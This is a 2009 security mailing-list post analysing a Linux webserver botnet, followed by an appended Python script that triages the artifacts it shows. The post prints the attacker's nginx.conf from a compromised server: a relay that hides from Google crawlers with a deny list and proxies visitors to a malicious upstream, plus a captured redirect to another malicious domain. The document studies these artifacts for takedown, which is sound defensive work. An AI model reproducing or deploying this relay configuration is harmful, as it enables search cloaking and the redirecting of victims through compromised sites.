[nsp-sec] Linux webserver botnet

Tom Daly tom at dyn.com
Tue Sep 15 15:49:42 EDT 2009


> They also said there was an abnormally high number of e-mail accounts
> associated with mail.ru so they have blocked that for now.  They are also
> working on adding more verification features to make it harder for this to
> happen.

We've seen the same thing: random e-mail accounts at various domains, from all over the place. We're mining the database now to see if we can find more hostnames.

One thing we did manage to find was a copy of the nginx.conf used on one of the r00ted Linux boxes. It looks like this:

tom at dhcp-241:~/test/nginx/conf$ cat nginx.conf
user root;
worker_processes  2;

error_log  logs/error.log  notice;
worker_rlimit_nofile 10240;

events { worker_connections  8192; use epoll;}

http {
  include       mime.types;
  access_log  off;

  sendfile        on;
  tcp_nopush     on;
  tcp_nodelay    on;
  keepalive_timeout  0;
  server_tokens off;
  server_names_hash_bucket_size 64;

  #//G
  deny 64.233.160.0/19;
  deny 66.102.0.0/20;
  deny 66.249.64.0/19;
  deny 72.14.192.0/18;
  deny 74.125.0.0/16;
  deny 89.207.224.0/24;
  deny 193.142.125.0/24;
  deny 194.110.194.0/24;
  deny 209.85.128.0/17;
  deny 216.239.32.0/19;

  server {
    listen 8080;
    location / {
      proxy_pass        http://mdvhost.com:4480;
      proxy_redirect    off;
      proxy_ignore_client_abort on;
      proxy_set_header  X-Real-IP  $remote_addr;
      proxy_set_header  Host        $host;
      proxy_buffers     100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
    location = /info { stub_status on; }
  }

}

tom at dhcp-241:~$ telnet mdvhost.com 4480
Trying 95.211.98.139...
Connected to mdvhost.com.
Escape character is '^]'.
GET /ts/in.cgi?reopen HTTP/1.0
Host:mdvhost.com

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 15 Sep 2009 17:33:56 GMT
Content-Type: text/html
Connection: close
Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Set-Cookie: TSUSER=reopen; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=traffcount.cn
Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Location: http://sexfinish.ru:8080/index.php

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://sexfinish.ru:8080/index.php'">
</head>
<body>
document moved <a href="http://sexfinish.ru:8080/index.php">here</a>
</body>
</html>
Connection closed by foreign host.

Should we consider trying to get mdvhost.com and sexfinish.ru pulled from their TLDs or get DNS hosting shut down?

-- 
Tom Daly
CTO, Dynamic Network Services, Inc.
Ph: 603-296-1537
http://dyn.com/
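Added example, not part of Tom's post or the list archive: a small Python triage script for the two artifacts above. It pulls the relay-node indicators out of an nginx.conf like the lifted one (workers running as root, access logging off, a proxy_pass to an external host on a non-standard port, a deny list of large netblocks, stub_status exposed) and pulls hostnames out of the upstream's redirect response (Location target, cookie domains, body URLs), which is the "find more hostnames" step and feeds the takedown question at the end of the post. The sample config and response are trimmed copies of the artifacts quoted in the post; which traits to flag, and the helper names, are this example's own assumptions.

```python
"""Triage helper for a suspected nginx relay node (added example, not from the
post): indicators out of a lifted nginx.conf, hostnames out of the upstream's
redirect response. Inputs are trimmed copies of the artifacts in the post."""
import ipaddress
import re

# Constructed from the nginx.conf in the post: tuning directives dropped,
# behaviour-relevant lines kept verbatim.
SAMPLE_CONF = """
user root;
events { worker_connections 8192; use epoll;}
http {
  access_log off;
  #//G
  deny 64.233.160.0/19;  deny 66.102.0.0/20;    deny 66.249.64.0/19;
  deny 72.14.192.0/18;   deny 74.125.0.0/16;    deny 89.207.224.0/24;
  deny 193.142.125.0/24; deny 194.110.194.0/24; deny 209.85.128.0/17;
  deny 216.239.32.0/19;
  server {
    listen 8080;
    location / { proxy_pass http://mdvhost.com:4480; proxy_set_header Host $host; }
    location = /info { stub_status on; }
  }
}
"""
# Constructed from the telnet capture in the post (head, blank line, body).
SAMPLE_RESPONSE = "\n".join([
    "HTTP/1.1 302 Found",
    "Server: nginx",
    "Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/",
    "Set-Cookie: TSUSER=reopen; path=/; domain=traffcount.cn",
    "Location: http://sexfinish.ru:8080/index.php",
    "",
    '<html><body>document moved <a href="http://sexfinish.ru:8080/index.php">here</a></body></html>',
])

def parse_nginx_directives(text):
    """Flatten nginx.conf into (context, directive, args) triples, context being
    the enclosing block names. Handles '#' comments and nesting, not quoting."""
    stripped = "\n".join(line.split("#", 1)[0] for line in text.splitlines())
    out, stack, tokens, buf = [], [], [], []
    for ch in stripped + "\n":
        if ch.isspace() or ch in ";{}":
            if buf:
                tokens.append("".join(buf)); buf = []
            if ch == ";" and tokens:
                out.append((tuple(stack), tokens[0], tokens[1:])); tokens = []
            elif ch == "{":                      # block directive, e.g. 'location / {'
                out.append((tuple(stack), tokens[0], tokens[1:]))
                stack.append(tokens[0]); tokens = []
            elif ch == "}":
                stack.pop()
        else:
            buf.append(ch)
    return out

def audit_proxy_config(text):
    """Flag the traits that make this config a relay node rather than a web server."""
    d = parse_nginx_directives(text)
    has = lambda name, arg: any(n == name and a[:1] == [arg] for _, n, a in d)
    f = {"runs_as_root": has("user", "root"),
         "access_log_off": has("access_log", "off"),
         "stub_status_exposed": has("stub_status", "on"),
         "listen_ports": sorted({a[0] for _, n, a in d if n == "listen" and a}),
         "upstreams": [], "denied_networks": []}
    for _, name, args in d:
        if name == "proxy_pass" and args:
            host = re.sub(r"^\w+://", "", args[0]).rstrip("/")
            if not host.startswith(("127.", "localhost", "unix:")):  # external relay
                f["upstreams"].append(host)
        elif name == "deny" and args and args[0] != "all":
            f["denied_networks"].append(ipaddress.ip_network(args[0], strict=False))
    # Total addresses denied: whole /16-/19 blocks means crawlers are being
    # cloaked from the content, not an individual abuser being blocked.
    f["denied_addresses"] = sum(n.num_addresses for n in f["denied_networks"])
    return f

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def redirect_hosts(raw):
    """Return (status, hostnames) a victim is bounced through: Location target,
    cookie domains the redirector tags the browser with, URLs in the body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    status, hosts = int(lines[0].split()[1]), set()
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            hosts.update(HOST_RE.findall(value))
        elif name.strip().lower() == "set-cookie":
            m = re.search(r"domain=([^;]+)", value, re.I)
            if m:
                hosts.add(m.group(1).strip().lstrip("."))
    hosts.update(HOST_RE.findall(body))
    return status, sorted(hosts)

def collect_iocs(config_text, response_raw):
    """Hostnames worth feeding to the DNS-mining / takedown step."""
    hosts = {u.rsplit(":", 1)[0] for u in audit_proxy_config(config_text)["upstreams"]}
    hosts.update(redirect_hosts(response_raw)[1])
    return sorted(hosts)

if __name__ == "__main__":
    print(audit_proxy_config(SAMPLE_CONF))
    print(collect_iocs(SAMPLE_CONF, SAMPLE_RESPONSE))
```

On the deny list: the seven largest blocks are, to my knowledge, Google netblocks, which fits the attacker's own `#//G` comment; the point of denying them on a relay is to keep crawlers from ever seeing the redirect, so the compromised site keeps its search ranking while humans get bounced. The parser is deliberately minimal (no quoted strings, no `include` expansion), which is enough for a lifted config like this one but would need extending before use on an arbitrary production nginx.conf.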